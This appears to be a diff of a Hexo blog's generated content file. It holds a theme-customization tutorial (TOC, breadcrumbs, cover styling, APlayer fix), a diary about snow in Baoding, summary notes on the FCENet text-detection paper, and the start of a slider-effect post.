    return topHeadingId;
    }
document.addEventListener()

​ The TOC highlights the heading you are currently at by giving its entry an active class; LESS handles the rest.

​ When the active entry falls outside the TOC's visible area, it is scrolled back into view.

    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
});
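​ One note: addEventListener's third argument is the capture flag (or an options object), not an interval, so a bare number there does nothing useful. If the goal is to limit how often the handler runs, a small throttle wrapper does it (throttle and onScrollHighlight are my names; wrap the handler body above in a named function first):

function throttle(fn, wait) {
    let last = 0;
    return function (...args) {
        const now = Date.now();
        if (now - last >= wait) {
            last = now;
            fn.apply(this, args); // run at most once per `wait` ms
        }
    };
}
document.addEventListener('scroll', throttle(onScrollHighlight, 200));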

toc.less

​ Still imitating Butterfly's layout: when the TOC is shown, the main content shifts left; a mobile adaptation is included too.

    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
background-color: #AAA; /* color of the scrollbar thumb */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }

dispatch_event.js

​ Newer versions of hexo-blog-encrypt provide a callback after decryption; update the plugin:

    npm update hexo-blog-encrypt

    After Decrypt Event

    Thanks to @f-dong, we now will trigger a event named hexo-blog-decrypt, so you can add a call back to listen to that event.

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

​ Re-initialize the TOC after decryption:

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

// define the callback
    function handleHexoBlogDecryptEvent() {
    console.log("文章解密成功!");
    initToc();
    }

// register the event listener
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);
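​ One detail worth stating: the dispatch shown above happens inside hexo-blog-encrypt after a successful decrypt, so our listener only has to exist by that moment; registering it up front at page load is the safe pattern:

window.addEventListener('hexo-blog-decrypt', function () {
    initToc(); // the decrypted headings exist now, so the TOC can be rebuilt
});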

Demo

​ Desktop:

png

​ Mobile:

png

Cover art that overflows its frame

​ A feature I dreamed up myself; an extra variable controls it so it looks a bit less like a hack.

Code

home.ejs

​ Modify home.ejs: a new post.cover_style variable lets a post's front-matter YAML control the cover image's style:

    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>

home.less

​ The corresponding LESS:

    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }

Making the overflow image

​ Time to retouch an overflow image in Photoshop. It's decided: 癫狂公爵西塔尔 it is! Even a madman should have manners.

​ My covers are normally 800px × 450px; this cover is 800px × 738px, with Photoshop used to keep the "frame" 450px tall and its top edge 150px below the top of the canvas.

    png

cover_style

​ Give the post a custom cover_style:

    cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

​ It overrides the previous cover style:

• height: 164%;: from 738 / 450 ≈ 1.64.
• position: absolute; top: 0; left: 0; object-fit: contain;: handles the overflow.
• transform: translateY(-20.3%);: shifts up by 20.3%, since 150 / 738 ≈ 20.3% (arithmetic checked below).
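​ A quick check of the two ratios:

$$\frac{738}{450} \approx 1.64 \;\Rightarrow\; \text{height: } 164\%, \qquad \frac{150}{738} \approx 0.203 \;\Rightarrow\; \text{translateY}(-20.3\%)$$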

Demo

​ Looks awesome!

png

Pinned-post icon

​ Give posts that carry a top attribute a pinned icon.

Code

home.ejs

    <% if(post.top){ %>
    <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
    <% } %>

home.less

​ And the matching style:

    .stiky{
    width: 18px;
    height: 18px;
    margin: 8px 6px 0 0;
    }

Demo

png

Lock icon

​ Show on the home page whether a post is encrypted, so nobody clicks through for nothing.

Code

home.ejs

​ Whether post.password is empty decides whether the post counts as encrypted.

    <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

Demo

    png

Breadcrumb navigation

​ My nested pages run deep, so add a breadcrumb bar to keep readers from getting lost.

header.ejs

​ Add a <ul> to hold the breadcrumb.

    <div class="h-left">
    <a href="<%= theme.menus_link.home %>" class="logo">
    <img src="<%- theme.logo %>" alt="Quiet">
    </a>
    <ul class="breadcrumb" id="breadcrumb"></ul>
    </div>

​ Call the JS at the bottom and pass the parameters in (getting values from YAML into JS is surprisingly fiddly):

    <%- js('js/breadcrumb.js') %>
    <script>
    var menus_title = [];
    <% Object.keys(theme.menus_title).forEach(function(menu) { %>
    menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
    <% }); %>
    <% if(page.categories){ %>
    <% page.categories.data.map((cat)=>{ %>
    categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
    <% }) %>
    <% } else { %>
    customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
    <% } %>
    </script>

​ Two breadcrumb flavors:

• customBreadcrumb simply builds the trail from the page URL.
• categoriesBreadcrumb builds the trail from a regular post's categories.

    function customBreadcrumb()

function customBreadcrumb(breadcrumb, menus_title) {
// current page path
var path = window.location.pathname;
var levels = path.split('/');
levels.shift(); // drop the leading empty string
levels.pop(); // drop the trailing empty string

// build the breadcrumb trail
for (var i = 0; i < levels.length; i++) {
var levelLink = '/';
for (var j = 0; j <= i; j++) {
levelLink += levels[j] + '/';
}
var levelName = decodeURIComponent(levels[i]);

if (i === 0) {
// look up levelName as a key in menus_title and grab its value
var title_obj = menus_title.find(function(item) {
return item[levelName] !== undefined;
});
var title_value = title_obj ? title_obj[levelName] : null;
if (!title_value) {
return; // no matching entry: bail out without rendering anything
}
}
}

// reaching here means every value resolved, so append the items to the breadcrumb
for (var i = 0; i < levels.length; i++) {
var levelLink = '/';
for (var j = 0; j <= i; j++) {
levelLink += levels[j] + '/';
}
var levelName = decodeURIComponent(levels[i]);
var li = document.createElement('li');
var a = document.createElement('a');
{
if (i === 0) {
a.textContent = title_value;
} else {
a.textContent = levelName;
}
if(i == levels.length - 1) {
a.classList.add("last");
}
a.href = levelLink;
}
li.appendChild(a);
breadcrumb.appendChild(li);
}
}
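​ A worked example of the logic above (values illustrative):

// path   = "/categories/学习/page/2/"
// levels = ["categories", "学习", "page", "2"]  (after shift/pop and decodeURIComponent)
// trail  = categories > 学习 > page > 2
// The first segment is renamed through menus_title; if menus_title has no
// entry for it, the early return above renders no breadcrumb at all.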

    function categoriesBreadcrumb()

    function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
    var li = document.createElement('li');
    var a = document.createElement('a');

    a.textContent = categories;
    a.href = categoriesLink;
    li.appendChild(a);
    breadcrumb.appendChild(li);

    li = document.createElement('li');
    a = document.createElement('a');

    a.textContent = "文章";
    a.href = window.location.href;
    a.classList.add("last");

    li.appendChild(a);
    breadcrumb.appendChild(li);
    }

header.less

​ Style it in the matching spot in header.less:

    .breadcrumb {
    margin-left: 5px;
    display: flex;
    list-style: none;
    padding: 0;
    a{
    color: #898fa0;
    text-decoration: none;
    }
    .last{
    color: #12183A;
    }
    .dot {
    display: inline-block;
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: #006AFF;
    position: relative;
    top: -12px;
    left: 2px;
    }
    }

    .breadcrumb li::before {
    color: #898fa0;
    content: ">";
    margin: 0 5px;
    }

​ And tweak the mobile adaptation:

    @media screen and (max-width:660px) {
    .header {
    .header-top {
    .h-left {
    flex-grow: 3;
    }
    ...

Result

customBreadcrumb

png

function categoriesBreadcrumb()

png

hexo-tag-aplayer conflicts with hexo-blog-encrypt

​ This seems to be a universal problem, whatever the theme.

​ Mark posts that use APlayer in their front matter:

    APlayer: true

​ From APlayer: APlayer 是一个简约且漂亮的 HTML5 音乐播放器,支持多种模式,包括播放列表模式、吸底模式 (gitee.com), grab APlayer.min.css and APlayer.min.js and drop them into the matching directories.

​ Modify header.ejs:

    <% if(page.APlayer) { %>
    <%- css('css/third-party/APlayer.min.css') %>
    <%- js('js/third-party/APlayer.min.js') %>
    <% } %>

​ Set a parameter in source/_config.yml to avoid injecting the assets twice (hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer (github.com)):

    aplayer:
    asset_inject: false

​ Done. I suspect the hexo-tag-map plugin needs the same treatment, but I don't like it and haven't used it in ages, so I'll leave it unconfigured.

Giscus comments

​ Switched the comment system to giscus.

tabs

​ Usage:

    {% tabs Unique name, [index] %}
    <!-- tab [Tab caption] [@icon] -->
    Any content (support inline tags too).
    <!-- endtab -->
    {% endtabs %}

    Unique name : Unique name of tabs block tag without comma.
    Will be used in #id's as prefix for each tab with their index numbers.
    If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
    Only for current url of post/page must be unique!
    [index] : Index number of active tab.
    If not specified, first tab (1) will be selected.
    If index is -1, no tab will be selected. It's will be something like spoiler.
    Optional parameter.
    [Tab caption] : Caption of current tab.
    If not caption specified, unique name with tab index suffix will be used as caption of tab.
    If not caption specified, but specified icon, caption will empty.
    Optional parameter.
    [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
    Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
    Optional parameter.

Tab caption taken from the unique name plus index

Icon only, no caption

Caption plus icon

    hide

​ Ported from Butterfly: Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

​ Available from 2.2.0 onwards.

​ Note: avoid h1–h6 headings inside tag-hide content. The TOC would list the hidden headings, and scrolling misbehaves whenever hidden content is not actually displayed.

inline

​ inline hides content behind a button inside a line of text; text only.

​ (the content must not contain an English comma; use &sbquo; instead)

    哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

    門裏站着一個人? {% hideInline 閃 %}


Block

​ block hides a standalone block of content; it can hide almost anything, including images and code blocks

​ (the display text must not contain an English comma; use &sbquo; instead)

    查看答案
    {% hideBlock 查看答案 %}
    傻子,怎麼可能有答案
    {% endhideBlock %}


Toggle

​ If there is too much to show, tuck it into a collapsible box and expand it only when needed.

​ (the display text must not contain an English comma; use &sbquo; instead)

    {% hideToggle Butterfly 安裝方法 %}
    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    {% endhideToggle %}

CSS vs LESS

​ Some browsers apparently choke on some of the syntax in my CSS files; rewriting it as LESS works!

png

Inject

Overview

​ Ported from: Butterfly 安裝文檔(四) 主題配置-2 | Butterfly

To add extra js/css/meta and the like, put it in Inject; it supports head (inserted before the </head> tag) and bottom (before the </body> tag).

Note: add the content as standard HTML

    inject:
    head:
    - <link rel="stylesheet" href="/self.css">
    bottom:
    - <script src="xxxx"></script>

​ This also sidesteps the problem of some JS getting clobbered by the encryption plugin. Wonderful!

Implementation

​ Add to post_head.ejs:

    <% if(page.inject) { %>
    <% if(page.inject.head) { %>
    <% for(let i = 0; i < page.inject.head.length; i++){ %>
    <%- page.inject.head[i] %>
    <% } %>
    <% } %>
    <% } %>

​ Add to footer.ejs:

    <% if(page.inject) { %>
    <% if(page.inject.bottom) { %>
    <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
    <%- page.inject.bottom[i] %>
    <% } %>
    <% } %>
    <% } %>

Collapsible TOC 2024/11/11

​ The TOC can finally fold like Butterfly's and other themes'! To opt out of folding, set this in the post front matter:

    toc_collapsed: false

Miscellaneous

• A few more CSS tweaks are not shown here; I adjusted things to taste.
• Thanks to my own curiosity and ChatGPT's considerable ability, I could write a lot of this code without ever studying front-end development systematically. What a rabbit hole!
• The original theme still has a small compile error; I'll fix it when I get the chance.
• All the colors really should live in variables; otherwise it stays a mess.
• Remembering the spaghetti code a colleague wrote back when I interned... I have tried to keep this reasonably tidy.
    ]]>
@@ -3619,7 +3619,7 @@ /posts/Diary-8-%E7%99%BD%E8%8C%AB%E8%8C%AB/
    + body{ background-image: url("background.webp"); background-attachment: fixed; background-size: cover; background-position: bottom; background-repeat: no-repeat; background-size: 100% auto; } .snow-cover{ position: relative; padding-bottom: 14.26%; margin-top: -70px; margin-bottom: -2em; background: url('snow.png'); background-size: contain; z-index: 4; pointer-events: none; transform: scaleX(1.2); @media screen and (max-width: 660px) { margin-top: -30px; } } .article-container { overflow-x: visible; }

Preface

jpg

Plane trees and ginkgos

​ It snowed heavily on 12.11, 12.13 and 12.14; supposedly the snow was even artificially seeded, since Hebei's pollution is so bad it can no longer snow naturally 😇.

​ The snow buried the anchor spots I had picked earlier, so I had to eyeball the framing 😅.

​ Only two weeks later did Hebei University think to call in snowplows, by which time the roads were coated in thick ice. Far too little, far too late 😡.

​ Logging PM values hardly seems worth it: they swing wildly within a single day; just judge the air quality by the color of the sky 🤧.


​ These two weeks my personal ~~copy-paste skills~~ front-end skills improved enormously! This trade really is a deep rabbit hole!

• Added an accumulated-snow effect!

• Press this Jelly button to toggle the falling-snow effect!

Stop snowing, I'm freezing! 🥶

​ The handiwork of a research-dodging slacker!

Main text

12.11

​ A big day! I saw snow and went absolutely feral 💃💃💃!

jpg

Taken at the Baoding zoo

​ Showing the sheltered Fujianese what snow looks like 😎!

Some of us have never even seen YY
And you're over there in short sleeves in 30-degree weather
How did you know I'm wearing short sleeves today
It's boiling today

12.12

My slides are done — when are we holding the group meeting 😈
Would tonight work?
Sure
Group meeting tonight at 7 in 326, LTC presenting. @everyone

​ With heavy snow forecast for tomorrow, our advisor moved the group meeting up to today. The meetings are usually relaxed, but this week's presenter got glib 🫣 and the advisor got genuinely angry 😡! Things were extremely awkward for a while.

The mood was crushing
Terrifying
Two years and I'd never seen the advisor blow up
Terrifying
Nobody dared touch 伟哥 anymore

12.13

It's properly snowing
Whoa
Knocking off early!

​ Heavy snow started outside while I was slacking in the lab, so I ran out for a look.

​ For the sake of page-load speed, the videos had to be squashed into tiny GIFs.

Outside the restroom window
The lab entrance

​ Snowy days are freezing; I watched for a bit and went back inside.

​ Today I learned that you don't need an umbrella when it snows 😯.

Too cold
Back to work early!

png

Fuzhou, what is going on over there?

​ That's the gap, I suppose. Though Fuzhou was pretty cold too on the day I wrote this.


jpg

Snowman ⛄

​ In the afternoon my roommates and I went out to build a snowman. Following a tutorial from an online class: pack a snowball by hand, then keep rolling it along the ground and it grows on its own.

​ Four of us made one ball each, which became the head, the body and the legs: a snowman was born!

Built by our dorm
Winner of the ugliest-snowman award

jpg

Snowballs flying everywhere

​ Then came a snowball fight; by the time we were done it was nearly dinnertime, so why not go straight for hotpot 🤪.

jpg

Hotpot

​ Hotpot in winter is rather comfortable.

jpg

Now that is impressive

​ I thought our snowman was decent, until I saw what other people built and realized how ugly ours really was 🫣.

12.14

Snow-covered cedar

​ Another day of heavy snow. I'm finally getting tired of it, mainly because walking in it is so hard.

12.15

​ The snow stopped. As everyone knows, melting snow absorbs heat, so Baoding's temperature plunged! However much you wear, you cannot stay outside long, or your ears will ache 😈.


jpg jpg
Lingering snow

​ Sadly Baoding cannot even afford to clear the snow; the solution is to let it dry out by itself 😅.


​ "Make good use of these, uh, three months; eight cards of compute is actually fairly generous, other students in the group can share it too, and after the three months, hmm, I'll have a word with your advisor, because there's a, uh, commercial side after three months, possibly some utility-fee matters, we'd collect a small utility fee, so I'll discuss that with your advisor then."

​ The compute from the intelligent computing center has arrived, probably the last batch, so I'd better hurry up and use it to train a pile of useless things 😇. Genuinely wasteful.

12.16

​ CET-6. Most unluckily I wrote the essay off topic, so I get to take it again 😅.

12.17

jpg

Which sunshine boy did this?

​ Checking in with the monster below the dorm.

jpg

Who lives in a pineapple under the sea?

​ Checking in at the pineapple house by the ginkgo avenue.

12.18

Gone
Next stop

​ Another friend got laid off and will probably be leaving Fuzhou 🫣.

12.20

​ Group meeting. The first-years finally finished a full reporting cycle; the advisor says the next meetings will change format.

​ The advisor also says no more low-tier journals. No! My Electronics 😭.

​ One month left until winter break; the semester is winding down...

12.21

​ The environment on the computing center is configured; training resumes!

12.23

​ Started polishing the blog theme. The search feature that once felt out of reach finally works, through the tireless effort of me and ChatGPT!

12.24

​ The dorm finally had all six of us together for once, so we went out for hotpot.

jpg

LONGBOO 2024

​ 2024 is nearly here!

​ Christmas Eve had no festive feeling at all: not a single Christmas decoration at the Wanda entrance 🙄, only street vendors selling little Christmas trinkets. Supposedly only the area around the church felt like a holiday.

jpg

Chaoshan beef hotpot

​ A one-day Shantou University experience card! Very much to my taste: the beef was fresh, and there was no spicy option, which I imagine thoroughly spoiled the meal for 湖南阳哥 😇!

jpg

Hotpot and then karaoke

​ After the hotpot the dorm went on to KTV; not a KTV person, I listened to them howl for a while and went back to rest 😇.

jpg

Merry Christmas!

​ Got a Santa hat and bought some "peace apples" 🍎, and that counts as celebrating Christmas 🤪.

    ]]>
@@ -3646,7 +3646,7 @@ /posts/Paper-Fourier%20Contour%20Embedding%20for%20Arbitrary-Shaped%20Text%20Detection/
+ Resources
    @inproceedings{zhu2021fourier,
    title={Fourier contour embedding for arbitrary-shaped text detection},
    author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
    booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
    pages={3123--3131},
    year={2021}
    }

Main text

Abstract

​ For arbitrary-shaped text detection, most existing methods model text instances in the image spatial domain, via masks or via contour point sequences in Cartesian or polar coordinates. Point-sequence representations may have limited capacity for modeling highly curved text.

​ To address this, the paper models text instances in the Fourier domain and proposes the novel Fourier Contour Embedding (FCE) method, which represents arbitrary-shaped text contours as compact signatures.

​ It further builds FCENet, with a backbone, a Feature Pyramid Network (FPN), and simple post-processing consisting of the Inverse Fourier Transform (IFT) and Non-Maximum Suppression (NMS). Unlike previous methods, FCENet first predicts compact Fourier signatures of text instances and then reconstructs text contours via IFT and NMS at test time. Extensive experiments show that FCE fits scene-text contours accurately and robustly even for highly curved shapes, and they validate FCENet's effectiveness and good generalization for arbitrary-shaped text detection.

​ It beats the then-current SOTA on CTW1500 and Total-Text!

1. Introduction

​ Spatial-domain methods have clear drawbacks. Mask representations imply inherently expensive post-processing and often need large amounts of training data; contour point sequences may be limited when modeling highly curved text.

png

This figure argues that TextRay, which models contours as point sequences in polar coordinates, cannot handle highly curved text well.

​ In this paper, text contours are modeled in the Fourier domain rather than the spatial domain; the Fourier transform can fit any closed contour through progressive approximation in a robust and simple way.

​ To this end, FCE converts a text contour's point sequence into a Fourier signature vector.

• First, a resampling scheme obtains a fixed number of dense points on each text contour. To keep the resulting signature unique, the sampling start point is the rightmost intersection between the contour and the horizontal line through the text center, the sampling direction is fixed clockwise, and the sampling interval along the contour is kept constant.
• Second, the sampled point sequence is embedded into the Fourier domain via the Fourier Transform (FT).

​ FCE's advantages for text-instance representation are threefold:

• Flexible: any closed contour, however complex its shape, can be fitted precisely;

• Compact: the Fourier signature vector is compact; in the experiments, Fourier degree K=5 already approximates text very accurately.

• Simple: converting between sampled point sequences and signatures is just the FT and the inverse FT, so FCE is easy to implement and introduces no complex post-processing.

​ Equipped with FCE, FCENet is built for arbitrary-shaped text detection. It consists of a ResNet50 backbone with Deformable Convolutions (DCN), an FPN neck, and a Fourier prediction head with two separate branches, classification and regression. The former predicts text-region and text-center-region masks; the latter predicts Fourier signature vectors, which are fed into the IFT to reconstruct text contour point sequences. Ground-truth contour point sequences serve as the supervision signal. Thanks to FCE's resampling scheme, the regression-branch loss is compatible across datasets, even though datasets such as CTW1500 and Total-Text annotate different numbers of contour points per text instance.

2.1. Segmentation-Based Methods

​ Segmentation-based methods.

2.2. Regression-Based Methods

​ Regression-based methods.

2.3. Explicit vs. Implicit Text Shape Representation

​ From the viewpoint of text-shape representation, current models fall roughly into two camps:

• methods that model text shape implicitly, via per-pixel masks or masks reconstructed from transformed features;
• methods that model text shape explicitly, via contour point sequences in Cartesian or polar coordinates.

3. Approach

3.1. Fourier Contour Embedding

​ An arbitrary closed text contour is represented by a complex-valued function $f:\mathbb{R}\mapsto\mathbb{C}$ of a real variable $t\in[0,1]$:

$$f(t)=x(t)+iy(t)$$

​ where $i$ is the imaginary unit and $(x(t),y(t))$ are the spatial coordinates at time $t$. Since $f$ traces a closed contour, $f(t)=f(t+1)$. Via the Inverse Fourier Transform (IFT), $f(t)$ can be rewritten as:

$$f(t)=f(t,\mathbf{c})=\sum_{k=-\infty}^{+\infty}\mathbf{c}_k e^{2\pi ikt}$$

​ where $k\in\mathbb Z$ is the frequency and $\mathbf c_k$ is the complex-valued Fourier coefficient characterizing the initial state of frequency $k$. Each component $\mathbf{c}_k e^{2\pi ikt}$ above is a circular motion with fixed frequency $k$ and initial hand vector $\mathbf c_k$, so the contour can be viewed as a combination of circular motions of different frequencies, like the pink circles in the figure below.

png

​ Since the analytic form of the contour function $f$ is unavailable in practice, the continuous $f$ is discretized into $N$ points $\left\{f\left(\frac{n}{N}\right)\right\}$ with $n\in[1,\dots,N]$. In that case $\mathbf c_k$ is computed by the Fourier transform:

$$\mathbf{c}_k=\frac{1}{N}\sum_{n=1}^{N}f\left(\frac{n}{N}\right)e^{-2\pi ik\frac{n}{N}}$$

​ where $\mathbf c_k=u_k+iv_k$, with $u_k$ the real part and $v_k$ the imaginary part. In particular, for $k=0$, $\mathbf c_0=u_0+iv_0=\frac{1}{N}\sum_n f\left(\frac{n}{N}\right)$ is the center of the contour. For any text contour $f$, FCE can represent it in the Fourier domain as a compact $2(2K+1)$-dimensional vector $[u_{-K},v_{-K},\dots,u_0,v_0,\dots,u_K,v_K]$, called the Fourier signature vector.
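​ A minimal sketch (mine, not the authors' code) of computing one coefficient $\mathbf c_k=u_k+iv_k$ directly from $N$ sampled points:

function fourierCoefficient(points, k) {
    // points: array of [x, y] pairs sampled along the contour, length N
    const N = points.length;
    let u = 0, v = 0;
    for (let n = 1; n <= N; n++) {
        const [x, y] = points[n - 1];
        const angle = -2 * Math.PI * k * n / N;
        // accumulate (x + iy) * e^{i*angle}
        u += x * Math.cos(angle) - y * Math.sin(angle);
        v += x * Math.sin(angle) + y * Math.cos(angle);
    }
    return [u / N, v / N]; // [u_k, v_k]
}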

​ FCE thus has two stages: resampling and Fourier transform. In the resampling stage, a fixed number of equally spaced points is sampled on the contour ($N=400$ in the experiments), giving the resampled point sequence $f$. This resampling is necessary because different datasets annotate different, and relatively small, numbers of ground-truth points per text instance: for instance, 14 in CTW1500 versus 4–8 in Total-Text. The resampling strategy makes FCE compatible with all datasets under the same setting. In the Fourier-transform stage, the resampled point sequence is transformed into its Fourier signature vector.
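​ A sketch of the resampling stage (again mine, under the stated uniform-spacing assumption): walk the annotated polygon and emit N points at equal arc-length intervals.

function resampleContour(points, N) {
    const closed = points.concat([points[0]]); // close the polygon
    const cum = [0];                           // cumulative arc length
    for (let i = 1; i < closed.length; i++) {
        const dx = closed[i][0] - closed[i - 1][0];
        const dy = closed[i][1] - closed[i - 1][1];
        cum.push(cum[i - 1] + Math.hypot(dx, dy));
    }
    const total = cum[cum.length - 1];
    const out = [];
    for (let n = 0; n < N; n++) {
        const target = (n / N) * total;        // arc length of the n-th sample
        let j = 1;
        while (cum[j] < target) j++;           // segment containing the target
        const t = (target - cum[j - 1]) / (cum[j] - cum[j - 1] || 1);
        out.push([
            closed[j - 1][0] + t * (closed[j][0] - closed[j - 1][0]),
            closed[j - 1][1] + t * (closed[j][1] - closed[j - 1][1]),
        ]);
    }
    return out;
}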

Uniqueness of the Fourier signature vector. From the procedure above, different resampled point sequences of the same contour yield different signature vectors. To make each text's signature unique, and to stabilize network training, constraints are placed on the start point, sampling direction and speed of $f(t)$:

• Start point: $f(0)$ (equivalently $f(1)$) is set to the rightmost intersection between the text contour and the horizontal line through the center $(u_0,v_0)$.

• Sampling direction: points are always resampled clockwise along the contour.

• Uniform speed: points are resampled uniformly along the contour, with the distance between every two adjacent points kept constant.

3.2. FCENet

​ Equipped with FCE, the anchor-free FCENet is proposed for arbitrary-shaped text detection.

​ Network architecture. FCENet follows a top-down scheme: a ResNet50 backbone with DCN, an FPN neck extracting multi-scale features, and a Fourier prediction head. Predictions are made on the FPN feature maps P3, P4 and P5. The head has two branches, responsible for classification and regression respectively.

​ Each branch consists of three $3\times 3$ convolution layers and one $1\times 1$ convolution layer, each followed by a ReLU activation.


    ​ 损失函数:

    $$\mathcal L=\mathcal L_{cls}+\lambda\mathcal L_{reg}$$

    $$\mathcal L_{cls}=\mathcal L_{tr}+\mathcal L_{tcr}$$

    ​ 其中 $\mathcal L_{tr}$ 和 $\mathcal{L}{tcr}$ 分别是文本区域(TR)和文本中心区域(TCR)的交叉熵损失。为了解决样本不平衡问题,$\mathcal L{tr}$ 采用 OHEM,正负样本之比为 $3:1$。

    ​ 对于 $\mathcal L_{reg}$,我们不最小化预测的傅立叶特征向量与其相应的地面实况之间的距离。相反,我们在图像空间域中最小化它们重构的文本轮廓,这与文本检测质量更相关。正式地

    $$\mathcal{L}_{reg}=\frac{1}{N{'}}\sum_{i\in\mathcal{T}}\sum_{n=1}{N{'}}w_il_1(F{-1}(\frac{n}{N{'}},\bar{\mathbf{c}}_i),F{-1}(\frac{n}{N^{'}},\hat{\mathbf{c}}_i))$$

    ​ 其中 $l_1$ 是用于回归的光滑 $−l_1$ 损失,$F^{−1}(·)$ 是 IFT。$\mathcal T$ 是文本区域像素索引集。$\bar{\mathbf c}_i$ 和 $\hat{\mathbf c}_i$ 是文本真实傅立叶特征向量,并且如果像素i在其对应的文本中心区域中,则为像素 $i$ 的预测值 $w_i=1$,而如果不是,则为 $0.5$。$N^t$ 是文本轮廓上的采样数。如果 $N^t$ 太小(通常 $N^t<30$),可能会导致拟合过度。

    ​ 因此,我们在实验中固定了 $N^t=50$。

    4. Experiments

    4.1. Datasets

    • CTW1500
    • Total-Text
    • ICDAR2015

    4.2. Implementation Details

    4.3. Evaluation of FCE

    4.4. Evaluation of FCENet

    4.5. Evaluation on Benchmark Datasets

    4.6. Evaluation on Highly-curved Subset

    5. Conclusion

​ This paper focuses on explicit shape modeling for arbitrary-shaped text detection. It proposes Fourier Contour Embedding, which can approximate any closed shape accurately, and then FCENet, which first predicts the Fourier signature vectors of text instances in the Fourier domain and then reconstructs text contour point sequences in the image spatial domain via the Inverse Fourier Transform. FCENet can be optimized end-to-end and implemented without any complex post-processing. Extensive evaluations of FCE and FCENet validate FCE's representation power, especially on highly curved text, and FCENet's good generalization when trained on few samples. FCENet achieves SOTA performance on CTW1500 and Total-Text and competitive results on ICDAR2015.

    ]]>
    @@ -3675,7 +3675,7 @@ /posts/Server-%E6%B2%B3%E5%8C%97%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83/ -
    ]]>
    +
    ]]>
    @@ -3704,7 +3704,7 @@ /posts/Web-%E5%8F%AF%E4%BB%A5%E6%8B%96%E5%8A%A8%E7%9A%84%E7%99%BE%E5%8F%B6%E7%AA%97%E6%95%88%E6%9E%9C/ - 前言

    ​ 使用 JavaScript 实现的效果,不知道该怎么描述,给它命名为”可以拖动的百叶窗吧!“。

    代码

    CSS

    slider.css 用于存放样式:

    .slider {
    box-sizing: border-box;
    position: relative;
    width: 80%;
    padding-bottom: 56.25%;
    height: 0;
    margin: 0 auto;
    overflow: hidden;
    margin-top: 1em;
    margin-bottom: 1em;
    }
    .slider a {
    display: block;
    height: 100%;
    object-fit: cover;
    position: absolute;
    width: 100%;
    z-index: 1;
    }
    .mask {
    position: absolute;
    left: 49.5%; /* 初始化在中间 */
    top: 0;
